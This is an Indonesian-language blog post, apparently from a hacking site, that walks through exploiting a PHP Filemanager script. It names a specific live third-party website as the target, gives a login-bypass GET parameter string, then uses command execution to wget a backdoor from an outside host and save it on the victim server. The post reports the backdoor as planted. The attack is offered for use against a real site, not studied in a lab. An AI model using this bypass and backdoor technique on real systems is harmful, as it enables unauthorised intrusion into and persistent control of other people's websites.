» » » PHP Filemanager Bypass Login And Get RCE Exploit

PHP Filemanager Bypass Login And Get RCE Exploit

Add Comment ,

Kali ini aing akan share bagaimana mengexploitasi bisa dibilang Plugins PHP Filemanager dengan bypass login dan tambahan RCE untuk membuat sebuah backdoor didalam. Bagaimana caranya? Simak sampai bawah.

Exploit Title : PHP Filemanager RCE
Tested On : Linux
Live bug : http://malayattoorchurch.com/galerany/phpfm.php

Buka live bug di atas menggunakan Browser Chrome , Mozilla Firefox , ataupun browser yang suka kalian gunakan.


Oke bisa kalian lihat PHP Filemanager di atas , loh kenapa harus masukin password ? tenang saja kita lakukan bypass terlebih dahulu.


Parameter GET: ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=

Masukan parameter di atas setelah phpfm.php berikut penampakannya :

Wohoo... lanjut kita coba inpiut sebuah backdoor , kita bisa menggunakan fungsi echo, curl ataupun wget. Kali ini saya menggunakan fungsi wget  :

command : wget https://site.com/door.txt
                     wget https://site.com/door.txt -O su.php.accdb

Sekarang kita cek apakah berhasil di wget atau tidak  :


Berhasil , backdoor tertanam pada directory /galery/su.php.accdb inget ya tiap web mungkin berbeda pathnya .

Thanks to: Febrian ID
source: tasik9etar & ur-solution

Related Posts:

0 Response to "PHP Filemanager Bypass Login And Get RCE Exploit"

Post a Comment

Subscribe to: Post Comments (Atom)